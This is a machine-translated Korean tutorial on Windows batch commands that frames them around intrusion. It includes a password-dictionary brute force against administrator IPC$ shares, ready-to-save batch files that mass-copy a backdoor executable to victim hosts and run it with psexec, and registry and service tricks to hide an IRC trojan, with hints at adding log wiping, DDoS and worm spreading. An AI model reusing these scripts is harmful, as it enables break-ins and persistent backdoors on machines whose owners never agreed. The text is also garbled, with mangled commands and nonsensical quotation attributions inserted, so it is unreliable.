일괄 처리를 통해 한 디스크의 모든 EXE 파일을 자동으로 삭제하려면 어떻게 해야 합니까?
Windows 의 명령줄 모드
(win+R) 안에 CMD 를 쓰면 windows 의 명령줄 모드로 들어갈 수 있습니다.
둘째:
배치 파일
배치 파일은 하나 이상의 명령을 포함하는 형식이 지정되지 않은 텍스트 파일입니다. 파일 확장자는 입니다. 박쥐 또는. Cmd 입니다. 명령 프롬프트에서 배치 파일의 이름을 입력하거나 배치 파일을 두 번 클릭하면 Cmd.exe 가 호출되어 명령이 파일에 나타나는 순서대로 하나씩 실행됩니다. 배치 파일 (배치 프로그램 또는 스크립트라고도 함) 을 사용하면 루틴 또는 반복 작업을 단순화할 수 있습니다. 물론, 우리 버전의 주요 내용은 배치 파일을 사용하여 시스템을 패치하고 백도어 프로그램을 대량으로 이식하는 등 침입에 대한 배치 프로세스의 실제 응용 프로그램을 소개하는 것입니다. 이 내용은 나중에 언급될 것입니다. (데이비드 아셀, Northern Exposure (미국 TV 드라마), 성공명언) 우리의 대량 학습 여행을 시작합시다. (이 글은 편폭이 길기 때문에 두 부분으로 나뉜다. 전반부는 주문서를 말하고 후반부는 사례 분석을 한다. ) 을 참조하십시오
먼저 배치 내부 명령에 대해 간단히 소개하겠습니다
1. 에코 명령
에코를 켜거나 끄거나 정보를 표시합니다. 인수가 없으면 echo 명령은 현재 echo 설정을 표시합니다.
문법
에코 [{켜기/끄기}] [메시지]
예: @echo off/echo hello world
실제 응용 프로그램에서는 이 명령과 방향 조정 기호 (파이프 기호라고도 하며 일반적으로 >; & gt& gt) 를 구현하여 일부 명령을 특정 형식의 파일에 입력하는데, 이는 향후 예에 반영될 것이다.
2.@ 명령
즉 @ 뒤의 명령은 표시되지 않습니다. 침입 과정 (예: 적의 하드 드라이브를 배치로 포맷하는 경우) 에서는 상대방이 사용하는 명령을 볼 수 없습니다.
예: @ 에코 끄기
@echo 프로그램을 초기화하는 중입니다. 잠시만 기다려 주십시오 ...
@ formatexx:/q/u/autoset
3.Goto 명령
태그로 이동하도록 지정합니다. 태그를 찾으면 프로그램은 다음 줄에서 명령 처리를 시작합니다.
구문: goto label (label 은 배치 프로그램에서 이동할 행을 지정하는 매개 변수입니다. ) 을 참조하십시오
샘플:
If {% 1}=={} noparms 로 이동
If {%2} = {} gotonoparms (여기 If,% 1, %2 를 이해하지 못하면 먼저 건너뛰고 나중에 자세히 설명하겠습니다. ) 을 참조하십시오
@Rem 매개 변수를 확인하고 비어 있으면 사용을 표시합니다
: noparms
에코 사용법: monitor.bat ServerIP 포트 번호
끝으로 이동
라벨의 이름은 마음대로 선택할 수 있지만 의미 있는 글자가 좋다. 글자 앞에 하나 추가: 글자가 레이블임을 나타내며, goto 명령은 이를 기반으로 합니다. 다음 단계를 찾아 그곳으로 점프합니다. (데이비드 아셀, Northern Exposure (미국 TV 드라마), 문자명언) 너는 다른 사람이 너의 의도를 이해할 수 있도록 몇 가지 설명을 하는 것이 좋겠다.
4.Rem 명령
Comment 명령은 c 언어의/*-*/에 해당합니다. 집행되지 않고 나중에 다른 사람이 읽고 수정할 수 있도록 주석 역할을 할 뿐이다.
원격 메시지
샘플: @Rem 여기 설명이 있습니다.
5. 명령을 일시 중지합니다
일시 중지 명령을 실행하면 다음 메시지가 표시됩니다.
계속하려면 아무 키나 누르십시오. 。 。
샘플:
@ 에코 끄기
: 시작
사본 a:*. * d:\ 반환
에코 드라이버 a 에 새 디스크를 넣으십시오
중단하다
시작으로 이동합니다
이 예에서는 드라이브 a 의 디스크에 있는 모든 파일이 d:\back 으로 복사됩니다. 드라이브 a 에 다른 디스크를 넣으라는 메시지가 표시됩니다. 일시 중지 명령은 디스크를 교체하고 아무 키나 눌러 프로세스를 계속할 수 있도록 프로그램을 일시 중지합니다.
6. 명령을 호출합니다
상위 배치 프로그램을 종료하지 않고 한 배치 프로그램에서 다른 배치 프로그램을 호출합니다. Call 명령은 호출 대상으로 사용되는 레이블을 허용합니다. 스크립트나 배치 파일 외부에서 Call 을 사용하면 명령줄에서 작동하지 않습니다.
구문 호출 [[드라이브:] [경로] 파일 이름 [배치 매개변수]] [:레이블 [매개변수]
매개 변수
[드라이브:} [경로] 파일 이름
호출할 배치 프로그램의 위치와 이름을 지정합니다. Filename 매개 변수에는. bat 또는 가 있어야 합니다. Cmd 확장.
7. 명령을 시작합니다
모든 DOS 명령 및 명령행 프로그램을 start 명령을 통해 호출할 수 있는 외부 프로그램을 호출합니다.
일반적인 침입 매개변수:
MIN 으로 시작하는 창을 최소화합니다
별도의 공간에서 16 비트 Windows 프로그램을 시작합니다.
높음 우선 순위가 높은 응용 프로그램을 시작합니다.
실시간 우선 순위 범주에서 응용 프로그램을 실시간으로 시작합니다.
WAIT 는 응용 프로그램을 시작하고 끝날 때까지 기다립니다.
매개 변수 이러한 매개 변수는 명령/프로그램에 전달되는 매개 변수입니다.
실행 중인 응용 프로그램이 32 비트 GUI 응용 프로그램이면 CMD.EXE 는 응용 프로그램이 종료될 때까지 기다리지 않고 명령 프롬프트를 반환합니다. 명령 스크립트에서 실행하는 경우 이 새로운 동작은 발생하지 않습니다.
8. 명령을 선택합니다
이 명령 사용을 선택하면 사용자가 문자를 입력하여 다른 명령을 실행할 수 있습니다. 사용할 때는 /c: 매개변수를 추가하고, c: 뒤에 입력할 수 있는 문자를 쓰고, 중간에 공백을 두지 마십시오. 반환 코드는 1234 입니다 ...
예: choice /c:dme defrag, mem, end
이 (가) 표시됩니다
Defrag, mem, end[D, m, E]?
샘플:
Sample.bat 의 내용은 다음과 같습니다.
@ 에코 끄기
Choice /c:dme 조각 모음, mem, end
오류 레벨 3 이 조각 모음으로 이동하는 경우 (가장 높은 값을 가진 오류 코드를 먼저 판단해야 함)
오류 레벨 2 인 경우 메모리로 이동합니다
오류 수준이 1 이면 끝으로 이동합니다
: 조각 모음
C:\dos\defrag
끝으로 이동
: 기억
기억
끝으로 이동
: 끝입니다
메아리 안녕
이 파일이 실행되면 defrag, mem, end[D, m, E]? 사용자가 d m e 를 선택할 수 있습니다. 그러면 if 문이 판단을 내립니다. D 는 defrag 로 표시된 프로그램 세그먼트 실행, m 은 mem 으로 표시된 프로그램 세그먼트 실행, e 는 end 로 표시된 프로그램 세그먼트 실행을 나타냅니다. 각 프로그램 섹션은 결국 goto end 가 있는 끝 태그로 이동하고 프로그램은 good bye 를 표시하고 파일은 끝납니다.
9.If 명령
If 는 지정된 조건이 충족되었는지 여부를 판단하고 다른 명령을 실행하기로 결정하는 것을 의미합니다. 다음과 같은 세 가지 형식이 있습니다.
1, "매개 변수" = = "문자열" 명령이 실행되는 경우
매개변수가 지정된 문자열과 같으면 조건이 참입니다. 명령을 실행합니다. 그렇지 않으면 다음 문장을 실행합니다. (두 개의 등호를 참고)
예를 들어 "%1"= = "a" 형식 a:
If {% 1}=={} noparms 로 이동
If {%2}=={} noparms 로 이동
2. 실행할 명령인 파일명이 있을 경우.
지정된 파일이 있으면 조건이 성립되고 명령을 실행합니다. 그렇지 않으면 다음 문장을 실행합니다.
If existconfig.sys editconfig.sys 와 같은.
3, if errorlevel/if not errorlevel 실행할 숫자 명령입니다.
반환 코드가 지정된 숫자와 같으면 조건이 참이고 명령이 실행됩니다. 그렇지 않으면 다음 문장은 달리는 것이다.
예를 들어 오류 수준 2 가 x2 로 이동하는 경우
DOS 프로그램이 실행되면 오류 코드 errorlevel 또는 반환 코드라고 하는 DOS 에 숫자를 반환합니다. 일반적인 반환 코드는 0, 1 입니다.
10. 명령에 사용
For 명령은 주로 지정된 범위 내에서 명령을 반복하는 데 사용되는 복잡한 명령입니다.
배치 파일에서 FOR 명령을 사용할 때 %%variable 을 사용하여 변수를 지정합니다.
For {%variable%% variable} in (set) do 명령 [CommandLineOptions]
%variable 은 단일 문자 대치 가능 매개변수를 지정합니다.
(set) 파일 또는 파일 그룹을 지정합니다. 와일드카드 문자를 사용할 수 있습니다.
Command 는 각 파일에 대해 실행할 명령을 지정합니다.
Command-parameters 특정 명령에 대한 매개변수 또는 명령행 스위치를 지정합니다.
배치 파일에서 FOR 명령을 사용할 때 %%variable 을 사용하여 변수를 지정합니다.
% 변수가 아닙니다. 변수 이름은 대/소문자를 구분하므로 %i 는% I 와 다릅니다.
명령 확장이 활성화된 경우 다음과 같은 추가 FOR 명령 형식이 영향을 받습니다
지원:
FOR/D% 변수 IN (set) DO 명령 [명령-매개변수]
컬렉션에 와일드카드 문자가 포함된 경우 파일 이름 대신 디렉토리 이름과 일치하도록 지정합니다.
For/r [[drive:] path]% variable in (set) do command [command-
루트 디렉토리가 [drive:]path 인 디렉토리 트리를 확인하고 각 디렉토리의 FOR 문을 가리킵니다. /R 뒤에 디렉토리를 지정하지 않으면 현재 디렉토리가 사용됩니다. 컬렉션이 하나의 점 (. ) 문자, 디렉토리 트리 열거.
FOR/L% 변수 IN (start, step, end) DO 명령 [command-para
이 컬렉션은 처음부터 끝까지 증가하는 일련의 숫자를 나타냅니다.
따라서 (1, 1, 5) 는 1 2 3 4 5, (5, 1,/kloc 시퀀스를 생성합니다
순서 (5 4 3 2 1).
(file-set) DO 명령의 FOR/F[" options "]% 변수
FOR/F[" options "]% 변수 IN ("string") DO 명령
FOR/F[" options "]% 변수가 (command) DO 명령에 있습니다
또는 usebackq 옵션이 있는 경우.
(file-set) DO 명령의 FOR/F[" options "]% 변수
FOR/F[" options "]% 변수 IN ("string") DO 명령
FOR/F[" options "]% 변수가 (command) DO 명령에 있습니다
Filenameset 은 하나 이상의 파일 이름입니다. 파일 이름 세트에서 계속합니다.
각 파일은 다음 파일까지 열리고 읽혀지고 처리됩니다.
처리에는 파일을 읽고 텍스트 행으로 나눈 다음 각 행을 로 나누는 작업이 포함됩니다
0 개 이상의 기호를 해석합니다. 그런 다음 찾은 기호 문자열의 변수 값을 사용합니다
For 루프를 호출합니다. 기본적으로 /F 는 각 파일의 각 행으로 구분됩니다.
의 첫 번째 빈 기호입니다. 빈 행을 건너뛰다. 옵션 을 지정할 수 있습니다
매개 변수는 기본 구문 분석 작업을 다시 작성합니다. 이 참조 문자열은 하나 이상의 문자열을 포함합니다.
서로 다른 해석 옵션에 대한 키워드를 지정합니다. 이러한 키워드는 다음과 같습니다.
Eol = C- 행 주석 문자의 끝 (하나만) 을 나타냅니다
Skip = n- 파일 시작 시 무시되는 행 수를 나타냅니다.
Delims = XXX- 구분 기호 세트를 나타냅니다. 이것은 공백과 탭을 대신한다.
기본 구분 기호 세트입니다.
Tokens=x, y, m-n- 각 반복에 전달되는 각 행의 기호를 나타냅니다.
자신을 위해. 이로 인해 추가 변수 이름이 발생합니다.
형식은 범위입니다. N 번째 기호로 m 을 지정합니다.
기호 문자열의 마지막 별표 문자,
그러면 추가 변수가 마지막 기호에서 분석됩니다.
해당 행의 예약된 텍스트를 할당하고 적용합니다.
Usebackq- 다음과 같은 경우에 새 구문이 사용되었음을 지정합니다.
역따옴표가 있는 문자열을 명령으로 실행합니다. 따옴표 문자는 텍스트 문자열 명령이며 fi 에서 파일 이름을 큰따옴표로 확장할 수 있습니다.
샘플 1:
FOR/F "eol =;; Tokens = 2,3 * delims =, "%i in (myfile.txt) do 명령
Myfile.txt 의 각 행이 분석되고 세미콜론으로 시작하는 행은 무시되고 각 행의 두 번째와 세 번째 기호가 for 프로그램 본문으로 전달됩니다. 쉼표 및/또는 공백으로 구분된 기호입니다. 이 for 프로그램 본문의 문은 %i 를 참조하여 두 번째 기호를 가져오고, %j 는 세 번째 기호를 가져오고, %k 는 세 번째 기호 뒤의 나머지 기호를 모두 가져옵니다. 공백이 있는 파일 이름의 경우 파일 이름을 큰따옴표로 묶어야 합니다. 이런 방식으로 큰따옴표를 사용하려면 usebackq 옵션도 사용해야 합니다. 그렇지 않으면 큰따옴표가 분석할 문자열을 정의하는 것으로 해석됩니다.
%i 는 for 문에 특별히 선언되었고 %j 와 %k 는 에 의해 선언되었습니다.
Tokens= 옵션은 특별히 지정됩니다. 문자 z 또는 z 보다 높은 변수를 설명하려 하지 않는 한 tokens= 한 줄로 최대 26 개의 기호를 지정할 수 있습니다. FOR 변수는 단일 문자이며 대/소문자를 구분하며 동시에 52 개 이상의 변수를 사용할 수 없습니다.
인접한 문자열에 FOR /F 구문 분석 논리를 사용할 수도 있습니다. Filenameset 를 작은 따옴표로 묶어 사용합니다. 이렇게 하면 문자열이 파일에서 단일 입력 행으로 간주됩니다.
마지막으로 FOR /F 명령을 사용하여 명령의 출력을 분석할 수 있습니다. 이렇게 하려면 괄호 안의 filenameset 을 닫힌 문자열로 변경합니다. 이 문자열은 CMD.EXE 에 명령줄로 전달되고 해당 출력은 메모리로 캡처되고 파일로 분석됩니다. 자, 예를 하나 들어보죠.
For/f "usebackqdelims = ="% I in (`set `) do @ echo% I
현재 환경에서 환경 변수의 이름을 열거합니다.
또한 변수 참조 대체도 향상되었습니다. 이제 다음을 사용할 수 있습니다
옵션 구문:
~ I- 따옴표 (") 를 삭제하고% I 를 확장합니다.
% ~ fI- %I 를 정규화된 경로 이름으로 확장합니다
%~dI-only %I 는 하나의 드라이브 문자로 확장됩니다.
% ~ pI- %I 만 하나의 경로로 확장됩니다.
%~nI-only %I 는 파일 이름으로 확장됩니다.
% ~% I 만 파일 확장자로 확장됩니다.
% ~ sI-–확장 경로에 짧은 이름만 포함됩니다.
% ~ aI- %I 를 파일의 파일 속성으로 확장합니다
% ~ tI- %I 를 파일의 날짜/시간으로 확장합니다
% ~ zI- %I 를 파일 크기로 확장합니다
% ~ $ PATH:I- PATH 환경 변수에 나열된 디렉토리를 찾아 %I 를 찾은 첫 번째 정규화된 이름으로 확장합니다. 환경 변수가 정의되지 않았거나 파일을 찾을 수 없는 경우 이 키 조합은 빈 문자열을 확장합니다.
수정자는 여러 가지 결과를 얻기 위해 결합할 수 있습니다.
% ~ dpI% I 만 하나의 드라이브 문자와 경로로 확장됩니다.
%~nxI-only %I 는 파일 이름과 확장자로 확장됩니다.
% ~ fsI- %I 만 짧은 이름을 가진 전체 경로 이름으로 확장합니다.
% ~ DP $ PATH:I- PATH 환경 변수에 나열된 디렉토리를 찾아 %I 를 첫 번째로 찾은 드라이브 문자와 경로로 확장합니다.
% ~ ftzaI- %I 를 비슷한 출력 행의 DIR 로 확장합니다
위의 예에서 %I 와 PATH 는 다른 유효한 값으로 대체될 수 있습니다. % ~ 구문
유효한 FOR 변수 이름으로 끝납니다. %I 와 같은 대문자 변수 이름을 선택하면 더 쉽게 읽을 수 있으며 대/소문자를 구분하지 않는 키 조합과의 혼동을 피할 수 있습니다.
다음은 MS 의 공식 도움말입니다. 다음은 침입 시 For 명령의 사용을 보여 주는 몇 가지 예입니다.
샘플 2:
For 명령은 대상 Win2k 호스트의 폭력적인 비밀번호를 해독하는 데 사용됩니다.
Netuse \ \ IP \ IPC $ "password"/u: "administrator" 를 사용하여 대상 호스트에 연결하려고 했습니다. 성공 후 암호를 기록해 두었습니다.
가장 중요한 명령은 for/f I% in (dict.txt) do net use \ \ IP \ IPC $ "I%"/u: "administrator" 입니다
I% 는 admin 의 비밀번호를 나타내는 데 사용됩니다. Dict.txt 에서 i% 의 이 값은 net use 명령과 연결되어 있습니다. 그런 다음 프로그램 실행 결과를 find 명령에 전달합니다
For/f I%% in (dict.txt) do net use \ \ IP \ IPC $ "I%%"/u: "관리자" find "
샘플 3:
뒷문+트로이마를 심기를 기다리는 육계가 많이 있습니까? 수량이 특히 많을 때, 원래 행복했던 모든 것이 매우 우울해질 것이다. (윌리엄 셰익스피어, 햄릿, 행복명언) 문장 시작 부분에서 언급했듯이 배치 파일을 사용하면 일상적인 작업이나 반복적인 작업을 단순화할 수 있습니다. 그렇다면 어떻게 실현할 수 있을까요? 허허, 다 보면 알게 될 거야.
주 명령은 하나뿐입니다 (배치 파일에서 FOR 명령을 사용할 때 지정 변수에 %%variable 사용).
@for /f "tokens= 1, 2,3 delims = "%%I in (victim.txt) do start call door.bat
토큰 사용은 위의 sample 1 을 참조하십시오. 여기서 victim.txt 의 내용을 door.bat 의 매개 변수 %i %j %k 로 순차적으로 전달하는 것을 의미합니다.
Cultivate.bat 는 net use 명령을 사용하여 IPC$ 연결을 설정하고 트로이+백도어를 피해자에 복사한 다음 return copy (If errorlever =) 를 사용하여 백도어를 성공적으로 채운 호스트를 필터링하고 지정된 파일로 반향합니다.
Delims= vivtim.txt 의 내용이 공백으로 구분됨을 나타냅니다. 이 victim.txt 의 내용이 어떤 모습인지 분명히 알 수 있을 것 같습니다. %%i %%j %%k 가 나타내는 개체 (일반적으로 IP 암호 사용자 이름) 별로 정렬되어야 합니다.
코드 프로토타입:
-여기서 잘라서 배치 파일 (제 이름은 main.bat) 로 저장합니다-
@ 에코 끄기
@if "% 1"== ""사용법으로 전환
@for /f "tokens= 1, 2,3 delims = "%%I in (victim.txt) do start call IPC hack;
@ 끝으로 이동
: 사용법
@echo 는 dos 모드에서 배치를 실행합니다. 또는 두 번 클릭합니다.
: 끝입니다
-여기서 잘라서 배치 파일 (제 이름은 main.bat) 로 저장합니다-
-여기서 잘라서 배치 파일 (내 이름은 door.bat) 로 저장합니다
@ netuse \ \%1\ IPC $% 3/u: "%2"
@if errorlevel 1 goto 가 실패했습니다
@echo IPC 연결을 설정하려고 합니다 ... 좋습니다
@ copywindrv32.exe \ \%1\ admin $ \ system32 & & amp 오류 수준 1 에코 IP% 1 사용자% 2pwd% 3 > 가 아닌 경우 & gtko.txt
@ psexec \ \%1c: \ winnt \ system32 \ windrv32.exe
@ psexec \ \%1net start windrv32 & & amp error level1echo%1백도어>& gtko.txt 가 아닌 경우
: 실패입니다
@echo 피해자에 연결할 수 없어서 죄송합니다.
-여기서 잘라서 배치 파일 (내 이름은 door.bat) 로 저장합니다
이것은 자동 뒷문 배치의 프로토 타입 일뿐입니다. 두 개의 배치 및 백도어 프로그램 (Windrv32.exe), psexec. Exe 는 통합 디렉터리에 배치해야 합니다. 대량의 내용.
로그 삭제 +DDOS 를 추가하는 기능, 정기적으로 사용자를 추가하는 기능, 심도를 통해 자동 전파 (웜) 기능을 제공하는 기능 등 확장할 수 있습니다. 여기서는 내가 묘사할 필요가 없다. 관심 있는 친구는 스스로 연구할 수 있다.
둘째, 배치 파일에서 매개 변수를 사용하는 방법
매개 변수는 일괄 처리에 사용할 수 있으며 일반적으로 1% 에서 9% 까지입니다. 여러 매개변수가 있는 경우 shift 키를 사용하여 이동해야 합니다. 이런 상황은 비교적 드물기 때문에 우리는 고려하지 않을 것이다.
샘플 1:fomat.bat
@ 에코 끄기
"%1"= = "a" 형식 a 인 경우:
: 형식입니다
@format a:/q/u/auotset
@echo 드라이브 a 에 다른 디스크를 삽입하십시오.
@ 일시 중지
@goto fomat
이 예는 여러 플로피 디스크를 연속적으로 포맷하는 데 사용되며 dos 창에 fomat.bat a 를 입력해야 합니다. 허허, 좀 쓸데없는 것 같아요 ~ _
샘플 2:
우리가 ipC$ 연결을 설정하려 할 때, 항상 일련의 명령을 입력해야 한다. 그렇지 않으면 오류가 발생할 수 있기 때문에, 우리는 몇 가지 고정 명령을 일괄 처리로 써서 육계의 IP 암호 사용자 이름을 이 배치에 매개변수로 지정하면 매번 명령을 두드리지 않아도 된다. (알버트 아인슈타인, Northern Exposure (미국 TV 드라마), 스포츠명언)
@ 에코 끄기
@ netuse \ \1%\ IPC $ "2%"/u: "3%" 참고 여기서 PASSWORD 는 두 번째 매개 변수입니다.
@if errorlevel 1 echo 연결 실패
어때요? 매개 변수를 사용하는 것이 더 간단하죠? 너는 어떻게 이렇게 잘생겼는지 분명히 배웠을 것이다.
셋째, 복합 명령을 사용하는 방법.
1.& amp
사용법: 첫 번째 명령&; 2 차 [&; 3 차 ...]
이렇게 하면 명령이 성공적으로 실행되었는지 여부에 관계없이 여러 명령을 동시에 실행할 수 있습니다.
샘플:
C: \ > 방향 z: & 카탈로그 c:\Ex4rch
시스템에서 지정된 경로를 찾을 수 없습니다.
드라이브 c 의 볼륨에 레이블이 없습니다.
볼륨 일련 번호는 0078-59FB 입니다
C:\Ex4rch 의 디렉토리
2002-05- 14 23:5 1
2002-05- 14 23:5 1 .....
Sometips.gif
3.
사용법: 첫 번째 명령, 두 번째 명령 [세 번째 명령 ...]
이렇게 하면 여러 명령을 동시에 실행할 수 있습니다. 올바른 명령은 후속 명령을 실행하지 않고 올바른 명령이 나타나지 않을 때 항상 모든 명령을 실행합니다.
샘플:
C: \ ex4rch > Dir sometips.gif del sometips.gif
드라이브 c 의 볼륨에 레이블이 없습니다.
볼륨 일련 번호는 0078-59FB 입니다
C:\Ex4rch 의 디렉토리
Sometips.gif
1 개 파일 14 바이트
카탈로그 0 개 768,696,320 바이트 사용 가능
조합 명령 사용 예:
샘플:
@ copytrojan.exe \ \%1\ admin $ \ system32 & & amp 오류 수준 1 에코 IP% 1 사용자 %2 이% 3>& gt 피해자. txt 를 통과하지 않은 경우
넷째, 파이프 명령 사용
1. 명령
사용법: 첫 번째 명령, 두 번째 명령 [세 번째 명령 ...]
첫 번째 명령의 결과를 두 번째 명령의 인수로 사용합니다. 이 방법은 유닉스 에서 흔히 볼 수 있습니다.
샘플:
시간/t > & gtD:\IP.log
Netstat-n-p TCP find ":3389" >>D: \ ip.log
브라우저를 시작합니다
보셨어요? 터미널 서비스를 통해 사용자는 아래 bat 를 실행하여 로그인한 사용자의 IP 를 얻을 수 있도록 사용자를 위한 초기 프로그램을 사용자 정의할 수 있습니다.
2.& gt, gt; & gt 출력 리디렉션 명령
명령 또는 프로그램의 출력을 특정 파일로 리디렉션합니다. >; With >> 와 달리 > 은 (는) 원본 파일의 내용을 지우고 지정된 파일에 쓰는 반면 >; & gt 는 내용만 지정된 파일에 추가되며 내용은 변경되지 않습니다.
샘플 1:
Echo hello world & gtc:\hello.txt (어리석은 예? ) 을 참조하십시오
샘플 2:
현재 DLL 목마가 유행하고 있습니다. 우리는 system32 가 숨바꼭질을 하기에 좋은 곳이라는 것을 안다. 많은 목마들이 머리를 뾰족하게 깎고 거기로 뚫고 가는데, DLL 마도 예외가 아니다. 따라서 시스템과 필요한 애플리케이션을 설치한 후 해당 디렉토리에 있는 EXE 및 DLL 파일을 기록할 수 있습니다.
CMD-convert 디렉토리를 system32-dir * 로 실행합니다. Exe >;; Exeback.txt & ampdir * 입니다. Dll & gtdllback.txt,
이렇게 하면 모든 EXE 및 DLL 파일의 이름이 exeback.txt 및 dllback.txt 에 각각 기록됩니다.
앞으로 이상이 발견되지만 기존의 방법으로는 문제가 발견되지 않을 경우 DLL 트로이가 시스템에 침투했는지 여부를 고려해야 합니다.
이 시점에서 동일한 명령을 사용하여 system32 아래의 EXE 및 DLL 파일을 다른 exeback 1.txt 및 dllback 1.txt 에 기록한 다음 다음을 실행합니다.
Cmd-fc exeback.txt exeback1.txt > Diff.txt & amp fc dllback.txt dllback1.txt > Diff.txt. (FC 명령을 사용하여 전후 DLL 과 EXE 파일을 비교하고 결과를 diff.txt 에 입력) 추가 DLL 과 EXE 파일을 찾아 생성 시간, 버전, 압축 여부를 보면 DLL 트로이 목마가 방문했는지 쉽게 확인할 수 있습니다 최고는 없다. 있는 경우 직접 DEL 하지 마십시오. 먼저 regsvr 32/U trojan.DLL 을 사용하여 뒷문 dll 파일을 취소하고 휴지통으로 이동합니다. 시스템에 이상이 없으면 바이러스 백신 소프트웨어 회사에 철저히 삭제하거나 제출한다.
3.& lt, gt; & amp,<& amp
& lt 는 키보드 대신 파일에서 명령 입력을 읽습니다.
& gt& amp 는 한 핸들의 출력을 다른 핸들의 입력에 기록합니다.
& lt& amp 는 한 핸들에서 입력을 읽고 다른 핸들의 출력에 씁니다.
이것들은 자주 사용하지 않아서 많이 소개하지 않는다.
5 위
다섯째, 배치 파일을 사용하여 레지스트리를 조작하는 방법?
침입 중에 레지스트리의 특정 키 값을 조작하여 Run 아래의 나머지 키 값을 제거하여 뒷문과 트로이 목마 프로그램을 숨기는 경우가 많습니다. 뒷문을 로드하는 서비스를 만들 수도 있습니다. 물론 레지스트리를 수정하여 시스템을 강화하거나 시스템의 속성을 변경할 수도 있습니다. 이를 위해서는 레지스트리의 작동에 대해 어느 정도 이해해야 합니다. 사용 방법을 배우자. REG 파일을 사용하여 레지스트리를 조작합니다. (일괄 처리를 사용하여 reg 파일을 생성할 수 있습니다. ) 을 참조하십시오
레지스트리 작업과 관련하여 일반적으로 작성, 수정 및 삭제가 있습니다.
1. 만들기
두 가지 작성 유형이 있습니다. 하나는 하위 항목을 작성하는 것입니다.
다음을 포함하는 파일을 만들었습니다.
Windows 레지스트리 편집기 버전 5.00
[HKEY _ local _ machine \ software \ Microsoft \ hacker]
그런 다음 스크립트를 실행합니다. HKEY _ 로컬 _ 기계 \ 소프트웨어 \ Microsoft 아래에' 해커' 라는 하위 항목을 만들었습니다.
다른 하나는 프로젝트 이름을 만드는 것입니다.
이 파일 형식은 레지스트리에서 내보낸 파일 형식과 일치하는 일반적인 파일 형식입니다. 내용은 다음과 같습니다.
Windows 레지스트리 편집기 버전 5.00
[HKEY _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run] "
침입자 "="Ex4rch"
"문" = c: \ \ winnt \ \ system32 \ \ door.exe
"Autodos"=dword:02
이것은 [HKEY 로컬 시스템 \ 소프트웨어 \ Microsoft \ 창 \ 현재 버전 \ 실행] 아래에 있습니다.
새로 만들기: 침입자, 문, 좌우.
침입자는 문자열 값 유형에 속합니다.
문 유형은 REG SZ Value 입니다.
Autodos 의 유형은 DWORD 값입니다.
수정
수정이 비교적 간단합니다. 수정해야 할 항목을 내보내고 메모장으로 수정한 후 가져오면 됩니다 (regedit /s).
삭제
먼저 프로젝트 이름을 삭제해야 합니다. 다음과 같이 파일을 작성해 보겠습니다.
Windows 레지스트리 편집기 버전 5.00
[HKEY _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run]
"Ex4rch"=-
이 스크립트를 실행하면 [HKEY _ local _ machine \ software \ Microsoft \ Windows \ 현재 버전 \ run] 아래의 "Ex4rch" 가 삭제됩니다.
자 피쳐 삭제를 다시 한 번 살펴보겠습니다. 다음과 같이 스크립트를 작성해 보겠습니다.
Windows 레지스트리 편집기 버전 5.00
[-HKEY _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run]
이 스크립트를 실행한 후 [HKEY 로컬 시스템 \ 소프트웨어 \ Microsoft \ 창 \ 현재 버전 \ 실행] 이 삭제되었습니다.
나는 네가 이미 기본적으로 장악했다고 믿는다. Reg 파일. 이제 목표는 일괄 처리를 통해 특정 컨텐츠가 있는. reg 파일을 만드는 것입니다. 앞서 말씀드렸듯이 리디렉션 기호를 사용하면 특정 유형의 파일을 쉽게 만들 수 있습니다.
Samlpe 1: 위의 예와 같이 다음 레지스트리 파일을 생성하려는 경우.
Windows 레지스트리 편집기 버전 5.00
[HKEY _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run]
침입자' =' ex4rch'
문 = 16 진수: 255
"au todos" = dword: 000000128
이렇게 말이죠.
@echo Windows 레지스트리 편집기 버전 5.00 & gt& gt 샘플. reg
@ echo [HKEY _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run] > 예제. reg
@ echo "Invader" = "Ex4rch">& gt 샘플. reg
@ echo "door" = 5>>C: \ \ winnt \ \ system32 \ \ door.exe > & gt 샘플. reg
@ echo "Autodos" = dword:02 & gt;; & gt 샘플. reg
샘플 2:
오래된 트로이 목마를 사용하면서 [HKEY _ local _ machine \ software \ Microsoft \ Windows \ current version \ (Runonce, Runservices, Runexec)] 그러나, 트로이의 경로를 쉽게 노출시켜 트로이가 죽임을 당하게 한다. 상대적으로 트로이를 시스템 서비스로 등록하는 것이 더 안전하다. 구성된 IRC 트로이 DSNX (windrv32.exe) 를 예로 들어 보겠습니다.
@ 시작 windrv32.exe
@ 속성 +h+r windrv32.exe
@ echo [HKEY _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run] > & gtpatch.dll
@ echo "winds NX" =-& gt;; & gtpatch.dll
@ sc.exe create windriver SRV type = kernel start = auto display name = windows driver binpath = c: \ winnt \ system
@ patch.dll
@ patch.dll 을 삭제합니다
@ REM[ 레지스트리에서 DSNXDE 에 대한 시작 항목을 삭제하고 sc.exe 에 시스템 중요 서비스로 등록하며 읽기 전용 숨기기, 자체 시작으로 구성 등록 정보를 설정합니다].
@REM, 이게 더 안전하지 않아 _.